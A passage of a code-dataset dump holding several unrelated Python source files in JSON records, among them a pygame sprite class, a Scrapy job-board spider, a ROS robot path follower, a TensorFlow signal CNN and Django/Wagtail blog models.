_loop.run_forever()\n\n","sub_path":"data_server_interface/python3/server_stock.py","file_name":"server_stock.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"531210236","text":"import pygame, random\nimport pygame, sys\nfrom pygame.locals import *\nfrom input_mech import *\nfrom random import randint\n\t\nclass Sprite:\n def load(self, file, x, y, w, h, fx1, fy1, fx2, fy2):\n self.sIMG = pygame.image.load(file)\n self.sX = x\n self.sY = y\n self.sW = w\n self.sH = h\n self.sFX1 = fx1 * w\n self.sFY1 = fy1 * h\n self.sFX2 = fx2 * w\n self.sFY2 = fy2 * h\n self.sIMG.set_clip(pygame.Rect(self.sFX1, self.sFY1, self.sW, self.sH))\n self.sF1 = self.sIMG.subsurface(self.sIMG.get_clip())\n self.sIMG.set_clip(pygame.Rect(self.sFX2, self.sFY2, self.sW, self.sH))\n self.sF2 = self.sIMG.subsurface(self.sIMG.get_clip())\n self.sFC = self.sF1\n self.animationint = 0\n self.collisionrect = pygame.Rect(self.sX, self.sY, self.sW, self.sH)\n self.clicked = False\n self.hovered = False\n return self.sIMG, self.sX, self.sY, self.sW, self.sH, self.sFX1, self.sFY1, self.sFX2, self.sFY2, self.sF1, self.sF2, self.sFC, self.animationint, self.collisionrect, self.clicked, self.hovered\n\n def update(self, mouseDown, mouseX, mouseY):\n self.collisionrect = pygame.Rect(self.sX, self.sY, self.sW, self.sH)\n if mouseClick(mouseDown, mouseX, mouseY, self.collisionrect):\n self.clicked = True\n else:\n self.clicked = False\n if mouseHover(mouseX, mouseY, self.collisionrect):\n self.hovered = True\n else:\n self.hovered = False\n def draw(self, confirmation, ds):\n if confirmation:\n if self.animationint > 30:\n self.animationint = 0\n self.animationint += 1\n if self.animationint < 15:\n self.sFC = self.sF1\n if self.animationint >= 15:\n self.sFC = self.sF2\n ds.blit(self.sFC, (self.sX, self.sY))\n\nclass GUI_Button(Sprite):\n def lGui(self, file, x, y, w, h, fx1, fy1, fx2, fy2):\n Sprite.load(self, file, x, y, w, h, fx1, fy1, fx2, fy2)\n self.originX = x\n self.originY = y\n \n def uGui(self, mouseDown, mouseX, mouseY):\n ''' WIP: Hover Text\n black = pygame.Color(0, 0, 0)\n fontObj = pygame.font.Font('freesansbold.ttf', 12)\n self.gText = fontObj.render('This is a button', True, black)\n self.gTextRect = self.gText.get_rect()\n self.gTextRect.y = self.sY + 0.5 * self.sH\n self.gTextRect.x = self.sX + 0.5 * self.sW\n '''\n if self.clicked:\n self.sFC = self.sF2\n else:\n self.sFC = self.sF1\n \n '''if self.hovered:\n self.sX = self.originX + 10\n else:\n self.sX = self.originX'''\n \n Sprite.update(self, mouseDown, mouseX, mouseY)\n def dGui(self, ds):\n Sprite.draw(self ,False , ds)\n '''\n if self.hovered:\n ds.blit(self.gText, self.gTextRect)\n '''\n\n","sub_path":"Python Game Development/sprite_classes.py","file_name":"sprite_classes.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"547069641","text":"import json\n\"\"\"\ndic = {}\nwith open(\"sample.json\",\"w\") as fw:\n with open(\"sample.csv\",\"r\") as fr:\n ls = [i.rstrip() for i in fr]\n ls = ls[0].split(\",\")+ls[1].split(\",\")\n for i in range(int(len(ls)/2)):\n dic[ls[i]] = ls[i+5]\n fw.write(str(dic))\n\"\"\"\n\nwith open(\"sample.json\",\"r\") as fr:\n header = fr.readline().strip().split(\",\")\n val = fr.readline().strip().split(\",\")\n\nd = {}\nfor i in range(len(header)):\n k = header[i]\n v = val[i]\n d[k] = v\n\nprint(d)\n","sub_path":"week_3/home_work.d/csvTojson.py","file_name":"csvTojson.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"102329610","text":"\"\"\"\nEntechts spider created on the top of ATSSpider\n\nscrapy crawl entechts -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.entechts.com/Jobs.aspx?Keyword=a\"\n\nSample URL:\n http://www.entechts.com/Jobs.aspx?Keyword=a\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveBadElements, UrlJoin\n\npattern = {\n 'count': compile(r'(\\d+)\\s*jobs\\s*match'),\n 'ref_id': compile(r'JOBID=(\\d+)'),\n}\n\n\nclass Entechts(ATSSpider):\n\n name = 'entechts'\n logo_url = ''\n\n def parse(self, response):\n sel = Selector(response)\n # set expected job count\n if not self.expected_job_count_set:\n expected_count = sel.xpath(\n '//ul/li/h3[contains(text(), \"jobs match\")]/text()'\n ).extract()\n if expected_count:\n match = pattern['count'].search(expected_count[0])\n if match:\n self.expected_job_count = expected_count[0]\n if not self.logo_url:\n self.logo_url = sel.xpath(\n '//div[@id=\"logo\"]/div/a/img/@src'\n ).extract()\n\n for div in sel.xpath(\n '//div/div[@class=\"job\"]'\n ):\n href = div.xpath(\n './div[@class=\"summary\"]/a/@href'\n ).extract()\n if href:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'company': div.xpath(\n './div[@class=\"client\"]/text()'\n ).extract(),\n 'location': div.xpath(\n './div[@class=\"location\"]/text()'\n ).extract(),\n 'jobcategory': div.xpath(\n './div[@class=\"sector\"]/text()'\n ).extract(),\n 'jobtype': div.xpath(\n './div[@class=\"type\"]/text()'\n ).extract(),\n 'baseSalary': div.xpath(\n './div[@class=\"rate\"]/text()'\n ).extract(),\n 'title': div.xpath(\n './div[@class=\"summary\"]/a/text()'\n ).extract(),\n },\n url=urljoin(response.url, href[0])\n )\n\n # pagination\n next_page = sel.xpath(\n '//div[contains(@class, \"pagination-btm\")]/a[@class=\"next-arrow right\"]/@href'\n ).extract()\n if next_page:\n yield Request(\n callback=self.parse,\n url=next_page[0]\n )\n\n def parse_job(self, response):\n \"\"\"\n Extract all required information.\n \"\"\"\n sel = Selector(response)\n\n loader = BrightcorpItemLoader(selector=sel)\n\n loader.add_value(\n 'title', response.meta.get('title')\n )\n loader.add_value(\n 'location', response.meta.get('location')\n )\n loader.add_value(\n 'company', response.meta.get('company')\n )\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-' % self.name),\n re=pattern['ref_id']\n )\n loader.add_value('url', response.url)\n loader.add_xpath(\n 'description',\n '//div/div[@class=\"details\"]',\n RemoveBadElements(['img', ])\n )\n loader.add_value(\n 'baseSalary', response.meta.get('baseSalary')\n )\n loader.add_value(\n 'jobtype', response.meta.get('jobtype')\n )\n loader.add_value(\n 'jobcategory', response.meta.get('jobcategory')\n )\n loader.add_value(\n 'logo_url',\n self.logo_url,\n UrlJoin(response.url)\n )\n loader.add_value('apply_url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/entechts.py","file_name":"entechts.py","file_ext":"py","file_size_in_byte":4182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"348935834","text":"from django.contrib import admin\nfrom .models import Question, Choice\n# Register your models here.\n\nclass ChoiceInline(admin.TabularInline):\n model = Choice\n extra = 3\n\nclass QuestionAdmin(admin.ModelAdmin):\n fieldsets = [\n ('Date Info', {'fields': ['published_on']}),\n (None, {'fields': ['body']}),\n ]\n inlines = [ChoiceInline]\n\nadmin.site.register(Question, QuestionAdmin)\n","sub_path":"app/polls/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"77437371","text":"#!/usr/bin/env python\n# -*- coding: utf-8\nimport glob\nimport os\n\nimport markdown\n\nfrom scriptlib import config, const\n\n\ndef read_file(filename):\n with open(filename) as fh:\n return fh.read().decode(\"utf-8\")\n\n\ndef write_file(filename, data):\n with open(filename, \"w\") as fh:\n fh.write(data)\n\n\ndef scan_dir(path):\n markdowns = []\n for filename in glob.glob(\"%s/*.md\" % path):\n markdowns.append(read_file(filename))\n return markdowns\n\n\ndef build_chapter(path):\n chapter = []\n if os.path.isfile(path):\n chapter.append(read_file(path))\n elif os.path.isdir(path):\n chapter.extend(scan_dir(path))\n return chapter\n\n\ndef filter_front_matter(chapter):\n \"\"\"\n Scan each chapter for Jekyll annotations at the beginning of each section\n and remove them.\n \"\"\"\n sections = []\n for section in chapter:\n counts = 0\n start = None\n lines = section.splitlines()\n for index, line in enumerate(lines):\n if counts == 2:\n start = index\n break\n if line == const.delimiter:\n counts += 1\n sections.append(\"\\n\".join(lines[start:]))\n return sections\n\n\ndef is_heading(key):\n if (key.startswith(\"#\") and\n not key.startswith(\"#B(\") and\n not key.startswith(\"#b(\") and\n not key.startswith(\"#(\") and\n not key.startswith(\"#Fun\")):\n return True\n return False\n\n\ndef get_anchor_name(heading):\n return heading.replace(\n '#', '').strip().replace(\n '.', '').replace(\n ' ', '_').replace(\n \"'\", '').replace(\n '`', '').lower()\n\n\ndef get_anchor(heading):\n return '' % get_anchor_name(heading)\n\n\ndef is_seen(key, seen):\n if seen.intersection([key]):\n return True\n return False\n\n\ndef remove_extra_headings(chapter, headings_only=False, include_anchors=True,\n as_string=True):\n \"\"\"\n Several chapters have their headings listed more than once (due to multiple\n markdown docs). This function removes all but the first one.\n \"\"\"\n sections = []\n seen = set()\n for section in chapter:\n filtered_section = []\n for line in section.splitlines():\n key = line.strip()\n if is_heading(key):\n if not is_seen(key, seen):\n if include_anchors:\n filtered_section.append(get_anchor(line))\n filtered_section.append(line)\n seen.add(key)\n elif not headings_only:\n filtered_section.append(line)\n if as_string:\n sections.append(\"\\n\".join(filtered_section))\n else:\n sections.extend(filtered_section)\n return sections\n\n\ndef assemble_headings(book_config):\n headings = []\n for chapter_location in book_config.chapters:\n chapter = build_chapter(chapter_location)\n headings.extend(\n remove_extra_headings(\n chapter, headings_only=True, include_anchors=False,\n as_string=False))\n return headings\n\n\ndef assemble_chapters(book_config, remove_front_matter=True):\n chapters = []\n for chapter_location in book_config.chapters:\n chapter = build_chapter(chapter_location)\n if remove_front_matter:\n chapter = filter_front_matter(chapter)\n chapter = remove_extra_headings(chapter)\n chapters.extend(chapter)\n return chapters\n\n\ndef assemble_book(book_config, remove_front_matter=True):\n chapters = [const.delimiter,\n \"layout: book\",\n \"title: %s\" % book_config.title,\n \"author: %s\" % \", \".join(book_config.authors),\n const.delimiter] + assemble_chapters(\n book_config, remove_front_matter)\n book = \"\\n\".join(chapters)\n return book.encode(\"utf-8\")\n\n\ndef generate_doc(book_config):\n markdown_data = assemble_book(book_config)\n write_file(book_config.md_file, markdown_data)\n\n\ndef generate_docs():\n for book_config in config.docs:\n generate_doc(book_config)\n","sub_path":"docs/v0.8/scriptlib/md.py","file_name":"md.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"275817611","text":"#!/usr/bin/env python\n\n\"\"\"\non any new /initialpose, do full rotation, then delay (to hone in amcl)\n\nfollow something ~15th pose in global path for all moves (about 0.3m away?)\n -maximum path length seems to be about 35*5 (45*5 max) for 2-3 meter path\n -(longer if more turns -- go for 15th or 20th pose, or max if less, should be OK)\n\nignore local path, except for determining if at goal or not\n\tif no recent local path, must be at goal: followpath = False, goalpose = true\n\nrequires dwa_base_controller, global path updated continuously as bot moves\n\n\"\"\"\n\n\nimport rospy, tf\nimport oculusprimesocket\nfrom nav_msgs.msg import Odometry\nimport math\nfrom nav_msgs.msg import Path\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\nfrom actionlib_msgs.msg import GoalStatusArray\nfrom move_base_msgs.msg import MoveBaseActionGoal\n\nlistentime = 0.6 # 0.6 # allows odom + amcl to catch up\nnextmove = 0\nodomx = 0\nodomy = 0\nodomth = 0\ntargetx = 0\t\ntargety = 0\ntargetth = 0\nfollowpath = False\npathid = None\ngoalth = 0 \ninitialturn = False\nwaitonaboutface = 0\nminturn = math.radians(8) # (was 6) -- 0.21 minimum for pwm 255\nminlinear = 0.08 # was 0.05\nmaxlinear = 0.5\nlastpath = 0 # refers to localpath\ngoalpose = False\ngoalseek = False\nmeterspersec = 0.33 # linear speed TODO: get from java\ndegperms = 0.0857 # turnspeed TODO: get from java\ntfth = 0\nglobalpathposenum = 20 # just right\nlistener = None\n\n\ndef pathCallback(data): # local path\n\tglobal goalpose, lastpath\n\t\n\tlastpath = rospy.get_time()\n\tgoalpose = False\n\t\ndef globalPathCallback(data):\n\tglobal targetx, targety, targetth , followpath, pathid\n\t\n\tn = len(data.poses)\n\tif n < 5:\n\t\treturn\n\t\t\n\tif n-1 < globalpathposenum:\n\t\tp = data.poses[n-1] \n\telse:\n\t\tp = data.poses[globalpathposenum]\n\t\n\ttargetx = p.pose.position.x\n\ttargety = p.pose.position.y\n\tquaternion = ( p.pose.orientation.x, p.pose.orientation.y,\n\tp.pose.orientation.z, p.pose.orientation.w )\n\ttargetth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\t\n\tfollowpath = True\n\tpathid = data.header.seq\n\ndef odomCallback(data):\n\tglobal odomx, odomy, odomth\n\todomx = data.pose.pose.position.x\n\todomy = data.pose.pose.position.y\n\tquaternion = ( data.pose.pose.orientation.x, data.pose.pose.orientation.y,\n\tdata.pose.pose.orientation.z, data.pose.pose.orientation.w )\n\todomth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\t\n\t# determine direction (angle) on map\n\tglobal tfth, listener\t \n\ttry:\n\t\t(trans,rot) = listener.lookupTransform('/map', '/odom', rospy.Time(0))\n\t\tquaternion = (rot[0], rot[1], rot[2], rot[3])\n\t\ttfth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\texcept (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):\n\t\tpass\t\n\ndef intialPoseCallback(data):\n\tif data.pose.pose.position.x == 0 and data.pose.pose.position.y == 0:\n\t\treturn\n\t# do full rotation on pose estimate, to hone-in amcl (if not docked)\n\trospy.sleep(0.5) # let amcl settle\n\toculusprimesocket.clearIncoming() # why?\n\toculusprimesocket.sendString(\"right 360\")\n\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\n\t\ndef goalCallback(d):\n\tglobal goalth, goalpose, lastpath, initialturn, followpath, nextmove\n\n\t# to prevent immediately rotating wrongly towards new goal direction \n\tlastpath = rospy.get_time()\n\tgoalpose = False\n\n\t# set goal angle\n\tdata = d.goal.target_pose\n\tquaternion = ( data.pose.orientation.x, data.pose.orientation.y,\n\tdata.pose.orientation.z, data.pose.orientation.w )\n\tgoalth = tf.transformations.euler_from_quaternion(quaternion)[2]\n\tinitialturn = True\n\tfollowpath = False\n\tnextmove = lastpath + 2 # sometimes globalpath still points at previoius goal\n\t\ndef goalStatusCallback(data):\n\tglobal goalseek\n\tgoalseek = False\n\tif len(data.status_list) == 0:\n\t\treturn\n\tstatus = data.status_list[len(data.status_list)-1] # get latest status\n\tif status.status == 1:\n\t\tgoalseek = True\n\ndef move(ox, oy, oth, tx, ty, tth, gth):\n\tglobal followpath, goalpose, tfth, pathid, initialturn, waitonaboutface\n\tglobal odomx, odomy, odomth\n\n\tcurrentpathid = pathid\n\n\t# determine xy deltas for move\n\tdistance = 0\n\tif followpath:\n\t\tdx = tx - ox\n\t\tdy = ty - oy\t\n\t\tdistance = math.sqrt( pow(dx,2) + pow(dy,2) )\n\t\n\tgoalrotate = False\n\tif distance > 0:\n\t\tth = math.acos(dx/distance)\n\t\tif dy <0:\n\t\t\tth = -th\n\telif goalpose:\n\t\tth = gth - tfth\n\t\tgoalrotate = True\n\telse:\n\t\tth = tth\n\t\n\t# determine angle delta for move\n\tdth = th - oth\n\tif dth > math.pi:\n\t\tdth = -math.pi*2 + dth\n\telif dth < -math.pi:\n\t\tdth = math.pi*2 + dth\n\t\t\n\t# force minimums\t\n\tif distance > 0 and distance < minlinear:\n\t\tdistance = minlinear\n\t\t\n\tif distance > maxlinear:\n\t\tdistance = maxlinear\n\n\t# supposed to reduce zig zagging (was 0.3)\n\tif dth < minturn*0.5 and dth > -minturn*0.5:\n\t\tdth = 0\n\telif dth >= minturn*0.5 and dth < minturn:\n\t\tdth = minturn\n\telif dth <= -minturn*0.5 and dth > -minturn:\n\t\tdth = -minturn\n\n\toculusprimesocket.clearIncoming()\n\n\t# if turning more than 120 deg, inch forward, make sure not transient obstacle (like door transfer)\n\tif abs(dth) > 2.0944 and not goalrotate and not initialturn and waitonaboutface < 1: \n\t\toculusprimesocket.sendString(\"forward 0.25\")\n\t\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\t\twaitonaboutface += 1 # only do this once\n\t\trospy.sleep(1)\n\t\treturn\n\t\t\n\twaitonaboutface = 0\n\n\tif not pathid == currentpathid:\n\t\treturn\n\n\tif dth > 0:\n\t\toculusprimesocket.sendString(\"left \" + str(int(math.degrees(dth))) ) \n\t\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\telif dth < 0:\n\t\toculusprimesocket.sendString(\"right \" +str(int(math.degrees(-dth))) )\n\t\toculusprimesocket.waitForReplySearch(\" direction stop\")\n\n\tif distance > 0:\n\t\toculusprimesocket.sendString(\"forward \"+str(distance))\n\t\trospy.sleep(distance/meterspersec)\n\t\tinitialturn = False\n\n\t# if goalrotate:\n\t\t# rospy.sleep(1) \n\t\t\n\t\t\t\ndef cleanup():\n\t# oculusprimesocket.sendString(\"move stop\")\n\t# oculusprimesocket.sendString(\"state delete navigationenabled\")\n\toculusprimesocket.sendString(\"log global_path_follower.py disconnecting\") \n\n\n# MAIN\n\n# rospy.init_node('dwa_base_controller', anonymous=False)\nrospy.init_node('global_path_follower', anonymous=False)\nlistener = tf.TransformListener()\noculusprimesocket.connect()\nrospy.on_shutdown(cleanup)\n\nrospy.Subscriber(\"odom\", Odometry, odomCallback)\nrospy.Subscriber(\"move_base/DWAPlannerROS/local_plan\", Path, pathCallback)\nrospy.Subscriber(\"move_base/goal\", MoveBaseActionGoal, goalCallback)\nrospy.Subscriber(\"move_base/status\", GoalStatusArray, goalStatusCallback)\nrospy.Subscriber(\"move_base/DWAPlannerROS/global_plan\", Path, globalPathCallback)\nrospy.Subscriber(\"initialpose\", PoseWithCovarianceStamped, intialPoseCallback)\n\noculusprimesocket.sendString(\"log global_path_follower.py connected\") \n# oculusprimesocket.sendString(\"state odomturndpms \"+str(degperms)) # degrees per ms \n# oculusprimesocket.sendString(\"state odomturnpwm 100\") # approx starting point smooth floor\n# oculusprimesocket.sendString(\"state odomlinearmpms \"+str(meterspersec/1000)) \n# oculusprimesocket.sendString(\"state odomlinearpwm 150\") # approx starting point\n\n# oculusprimesocket.sendString(\"speed \"+str(linearspeed) )\n\nwhile not rospy.is_shutdown():\n\tt = rospy.get_time()\n\t\n\tif t >= nextmove:\n\t\t# nextmove = t + listentime\n\t\tif goalseek and (followpath or goalpose): \n\t\t\tmove(odomx, odomy, odomth, targetx, targety, targetth, goalth) # blocking\n\t\t\tnextmove = rospy.get_time() + listentime\n\t\t\tfollowpath = False\n\t\n\tif t - lastpath > 3:\n\t\tgoalpose = True\n\t\n\trospy.sleep(0.01)\n\t\n","sub_path":"src/global_path_follower.py","file_name":"global_path_follower.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"314010037","text":"import tensorflow as tf\n\nclass SignalCNN(object):\n # A CNN for signal regression.\n\n def __init__(self, signal_length, num_outputs, filter_sizes, num_filters):\n\n # Placeholders for input, output and dropout\n self.input_x = tf.placeholder(tf.float32, [None, 2, signal_length, 1], name=\"input_x\")\n self.input_y = tf.placeholder(tf.float32, [None, num_outputs], name=\"input_y\")\n self.dropout_keep_prob = tf.placeholder(tf.float32, name=\"dropout_keep_prob\")\n\n pooled_outputs = []\n\n for i, filter_size in enumerate (filter_sizes):\n with tf.name_scope(\"conv-maxpool-%s\" % filter_size):\n # Convolutional Layer\n conv1 = tf.layers.conv2d (\n inputs=self.input_x,\n filters=num_filters,\n kernel_size=[2, filter_size],\n padding='VALID',\n activation=tf.nn.relu)\n print ('conv1', conv1)\n\n # pool_size = tf.int32(filter_size/2)\n # Max-pooling over the outputs\n pooled1 = tf.layers.max_pooling2d(\n inputs=conv1,\n pool_size=[1, 2],\n strides=[1, 1],\n padding='VALID')\n pooled1 = tf.nn.dropout(pooled1, self.dropout_keep_prob)\n print ('pool1', pooled1)\n\n # Convolutional Layer\n conv2 = tf.layers.conv2d (\n inputs=pooled1,\n filters=num_filters,\n kernel_size=[1, filter_size],\n padding='VALID',\n activation=tf.nn.relu)\n print ('conv2', conv2)\n\n # Max-pooling over the outputs\n pooled2 = tf.layers.max_pooling2d(\n inputs=conv2,\n pool_size=[1, 2],\n strides=[1, 1],\n padding='VALID')\n pooled2 = tf.nn.dropout(pooled2, self.dropout_keep_prob)\n print ('pool2', pooled2)\n\n pooled2 = tf.contrib.layers.flatten(pooled2)\n pooled_outputs.append(pooled2)\n\n # Combine all the pooled features\n self.h_pool_flat = tf.concat(pooled_outputs, 1)\n print ('h_pool_flat', self.h_pool_flat)\n self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)\n \n with tf.name_scope(\"fully_connected_layer1\"):\n self.fclayer1 = tf.contrib.layers.fully_connected(self.h_drop, 8192, activation_fn=tf.nn.relu)\n self.h_drop1 = tf.nn.dropout(self.fclayer1, self.dropout_keep_prob)\n\n with tf.name_scope(\"fully_connected_layer2\"):\n self.fclayer2 = tf.contrib.layers.fully_connected(self.h_drop1, 4096, activation_fn=tf.nn.relu)\n self.h_drop2 = tf.nn.dropout(self.fclayer2, self.dropout_keep_prob)\n\n with tf.name_scope(\"fully_connected_layer3\"):\n self.fclayer3 = tf.contrib.layers.fully_connected(self.h_drop2, 2048, activation_fn=tf.nn.relu)\n self.h_drop3 = tf.nn.dropout(self.fclayer3, self.dropout_keep_prob)\n\n with tf.name_scope(\"fully_connected_layer4\"):\n self.fclayer4 = tf.contrib.layers.fully_connected(self.h_drop3, 1024, activation_fn=tf.nn.relu)\n self.h_drop4 = tf.nn.dropout(self.fclayer4, self.dropout_keep_prob)\n\n #with tf.name_scope(\"fully_connected_layer5\"):\n # self.fclayer5 = tf.contrib.layers.fully_connected(self.h_drop4, 512, activation_fn=tf.nn.relu)\n # self.h_drop5 = tf.nn.dropout(self.fclayer5, self.dropout_keep_prob)\n #\n # with tf.name_scope(\"fully_connected_layer6\"):\n # self.fclayer6 = tf.contrib.layers.fully_connected(self.h_drop5, 2500, activation_fn=tf.nn.relu)\n # self.h_drop6 = tf.nn.dropout(self.fclayer6, self.dropout_keep_prob)\n #\n # with tf.name_scope(\"fully_connected_layer7\"):\n # self.fclayer7 = tf.contrib.layers.fully_connected(self.h_drop6, 1250, activation_fn=tf.nn.relu)\n # self.h_drop7 = tf.nn.dropout(self.fclayer7, self.dropout_keep_prob)\n #\n # with tf.name_scope(\"fully_connected_layer8\"):\n # self.fclayer8 = tf.contrib.layers.fully_connected(self.h_drop7, 625, activation_fn=tf.nn.relu)\n # self.h_drop8 = tf.nn.dropout(self.fclayer8, self.dropout_keep_prob)\n\n with tf.name_scope(\"output_layer\"):\n self.predictions = tf.contrib.layers.fully_connected(self.h_drop4, num_outputs, activation_fn=None)\n \n with tf.name_scope(\"RMSE\"):\n self.rmse = tf.sqrt(tf.reduce_mean(tf.square(self.predictions - self.input_y)))\n\n with tf.name_scope(\"cost\"):\n self.cost = tf.reduce_mean(tf.square(self.predictions - self.input_y))\n tf.summary.scalar(\"cost\", self.cost)\n","sub_path":"mimic_cnn_class.py","file_name":"mimic_cnn_class.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"110700463","text":"from django.db import models\n\n# Create your models here.\nfrom zinnia.models_bases import entry\n\n\nclass Picture(models.Model):\n title = models.CharField(max_length=50)\n image = models.ImageField(upload_to='gallery')\n\n\nclass Gallery(models.Model):\n title = models.CharField(max_length=50)\n pictures = models.ManyToManyField(Picture)\n\n\nclass EntryGallery(\n entry.CoreEntry,\n entry.ContentEntry,\n entry.DiscussionsEntry,\n entry.RelatedEntry,\n entry.ExcerptEntry,\n entry.FeaturedEntry,\n entry.AuthorsEntry,\n entry.CategoriesEntry,\n entry.TagsEntry,\n entry.LoginRequiredEntry,\n entry.PasswordRequiredEntry,\n entry.ContentTemplateEntry,\n entry.DetailTemplateEntry\n):\n # image = models.ForeignKey(Picture)\n gallery = models.ForeignKey(Gallery)\n\n def __str__(self):\n return 'EntryGallery %s' % self.title\n\n class Meta(entry.CoreEntry.Meta):\n abstract = True\n","sub_path":"blogimages/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"640979712","text":"import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django import forms\n\nfrom modelcluster.contrib.taggit import ClusterTaggableManager\nfrom modelcluster.fields import ParentalKey\n\nfrom taggit.models import TaggedItemBase\n\nfrom wagtail.core.models import Page, Orderable\nfrom wagtail.core.fields import RichTextField\nfrom wagtail.admin.edit_handlers import FieldPanel, InlinePanel, MultiFieldPanel\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.search import index\nfrom wagtail.snippets.models import register_snippet\nfrom wagtail.snippets.edit_handlers import SnippetChooserPanel\n\n@register_snippet\nclass BlogAuthor(models.Model):\n name = models.CharField(max_length=255)\n icon = models.ForeignKey(\n \"wagtailimages.Image\", null=True, blank=True,\n on_delete=models.SET_NULL, related_name=\"+\"\n )\n\n panels = [\n FieldPanel(\"name\"),\n ImageChooserPanel(\"icon\"),\n ]\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"blog authors\"\n\n# Create your models here.\nclass EventsIndexPage(Page):\n intro = RichTextField(blank=True)\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n eventpages = self.get_children().live().order_by(\"-first_published_at\")\n context[\"eventpages\"] = eventpages\n return context\n\n content_panels = Page.content_panels + [\n FieldPanel(\"intro\"),\n ]\n\n# Still need to add event image field\nclass EventPage(Page):\n parent_page_types = ['blog.EventsIndexPage']\n gig_date = models.DateField(default=timezone.now)\n gig_time = models.CharField(default=\"19:30\", max_length=5)\n gig_location = models.CharField(default=\"Location TBA\", max_length=200)\n location_link = models.CharField(max_length=2083, default=\"https://www.uptheantics.co.uk\")\n ticket_link = models.CharField(max_length=2083, default=\"https://www.uptheantics.co.uk\")\n price = models.CharField(max_length=6, default=\"5\")\n intro = models.CharField(max_length=100)\n body = RichTextField(blank=True)\n representative_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n content_panels = Page.content_panels + [\n FieldPanel(\"gig_date\"),\n FieldPanel(\"gig_time\"),\n FieldPanel(\"gig_location\"),\n FieldPanel(\"price\"),\n MultiFieldPanel([\n FieldPanel(\"location_link\"),\n FieldPanel(\"ticket_link\"),\n ], heading=\"Relevant Links\"),\n FieldPanel(\"intro\"),\n FieldPanel(\"body\", classname=\"full\"),\n ImageChooserPanel('representative_image'),\n ]\n\nclass BlogIndexPage(Page):\n intro = RichTextField(blank=True)\n\n def get_context(self, request):\n # Update context to include only published posts, ordered by reverse-chron\n context = super().get_context(request)\n all_posts = self.get_children().live().type(BlogPage).order_by(\"-first_published_at\")\n recent_posts = all_posts[:10]\n context[\"recent_posts\"] = recent_posts\n context[\"all_posts\"] = all_posts\n subpage_types = [\"Blog\"]\n return context\n\nclass BlogArchives(Page):\n def get_context(self, request):\n context = super(BlogArchives, self).get_context(request)\n\n # Get the full unpaginated listing of resource pages as a queryset -\n blogpages = self.get_siblings(inclusive=False).live().order_by(\"-first_published_at\")[9:]\n\n paginator = Paginator(blogpages, 10) # Show 5 resources per page\n\n page = request.GET.get('page')\n try:\n blogpages = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n blogpages = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n blogpages = paginator.page(paginator.num_pages)\n\n # make the variable 'resources' available on the template\n context['blogpages'] = blogpages\n\n return context\n\n def __str__(self):\n return self.name\n\nclass BlogPage(Page):\n parent_page_types = ['blog.BlogIndexPage']\n date = models.DateField(default=timezone.now)\n intro = models.CharField(max_length=250)\n body = RichTextField(blank=True)\n author = models.ForeignKey(\n \"blog.BlogAuthor\",\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n representative_image = models.ForeignKey(\n 'wagtailimages.Image',\n null=True,\n blank=True,\n on_delete=models.SET_NULL,\n related_name='+'\n )\n\n def main_image(self):\n gallery_item = self.gallery_images.first()\n if gallery_item:\n return gallery_item.image\n else:\n return None\n\n search_fields = Page.search_fields + [\n index.SearchField(\"intro\"),\n index.SearchField(\"body\"),\n ]\n\n content_panels = Page.content_panels + [\n MultiFieldPanel([\n SnippetChooserPanel(\"author\"),\n ], heading=\"Blog information\"),\n FieldPanel(\"intro\"),\n FieldPanel(\"body\", classname=\"full\"),\n InlinePanel(\"gallery_images\", label=\"Gallery Images\"),\n ImageChooserPanel('representative_image'),\n ]\n\nclass 